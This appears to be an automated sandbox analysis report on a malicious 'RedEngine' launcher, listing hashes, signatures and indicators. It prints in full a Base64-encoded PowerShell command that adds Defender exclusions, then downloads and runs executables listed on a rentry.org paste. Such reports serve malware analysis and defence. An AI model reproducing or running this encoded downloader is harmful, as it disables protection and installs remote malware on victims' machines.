Overview
overview
10Static
static
3RedEngine.7z
windows7-x64
3RedEngine.7z
windows10-2004-x64
3RedEngine/...er.exe
windows7-x64
10RedEngine/...er.exe
windows10-2004-x64
10RedEngine/libEGL.dll
windows7-x64
1RedEngine/libEGL.dll
windows10-2004-x64
1RedEngine/...v2.dll
windows7-x64
1RedEngine/...v2.dll
windows10-2004-x64
1Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
25-06-2024 11:34
Static task
static1
Behavioral task
behavioral1
Sample
RedEngine.7z
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
RedEngine.7z
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
RedEngine/Launcher.exe
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
RedEngine/Launcher.exe
Resource
win10v2004-20240611-en
Behavioral task
behavioral5
Sample
RedEngine/libEGL.dll
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
RedEngine/libEGL.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral7
Sample
RedEngine/libGLESv2.dll
Resource
win7-20240611-en
Behavioral task
behavioral8
Sample
RedEngine/libGLESv2.dll
Resource
win10v2004-20240508-en
General
-
Target
RedEngine/Launcher.exe
-
Size
7KB
-
MD5
eee2a79d3170f463e9697ddb8b97d41e
-
SHA1
818c82b1743c91f423c92742b54355b2058ff417
-
SHA256
a4569f2cabda528425ec397aef16d6f8fc15ca94664f6f98d738d0b3dc570b41
-
SHA512
139b6366a088d9aaa055fae4c7853c872fe4a31dfb7dc8e3961f144db0d712342fd4e9ef6f20e5f3cbb225a4f23c3ed24e55d144f9342398e8305f54a327d5ea
-
SSDEEP
192:nx92qvjK3xszfzzztCbxbsIcaqcINv/DvxIcaBlNtUqKwceNdM:x91v4O5CbxbbcaqcIND6cazNt/BcebM
Malware Config
Extracted
https://rentry.org/pancek61111111111111/raw
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 5 2492 powershell.exe 6 2492 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2492 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2492 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
Launcher.exedescription pid process target process PID 2172 wrote to memory of 2492 2172 Launcher.exe powershell.exe PID 2172 wrote to memory of 2492 2172 Launcher.exe powershell.exe PID 2172 wrote to memory of 2492 2172 Launcher.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\RedEngine\Launcher.exe"C:\Users\Admin\AppData\Local\Temp\RedEngine\Launcher.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAZwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdAB6AHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbABiAHcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaAByAGQAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAHAAYQBuAGMAZQBrADYAMQAxADEAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbAB0AHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAGgAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBjAHkAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAcQBuAHUAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZABpAGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAG4AZwB2ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB4AG4AbAAjAD4A"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2172-0-0x000007FEF5973000-0x000007FEF5974000-memory.dmpFilesize
4KB
-
memory/2172-1-0x00000000003F0000-0x00000000003F8000-memory.dmpFilesize
32KB
-
memory/2492-6-0x0000000002C10000-0x0000000002C90000-memory.dmpFilesize
512KB
-
memory/2492-7-0x000000001B6E0000-0x000000001B9C2000-memory.dmpFilesize
2.9MB
-
memory/2492-8-0x00000000029E0000-0x00000000029E8000-memory.dmpFilesize
32KB
-
memory/2492-9-0x0000000002C10000-0x0000000002C90000-memory.dmpFilesize
512KB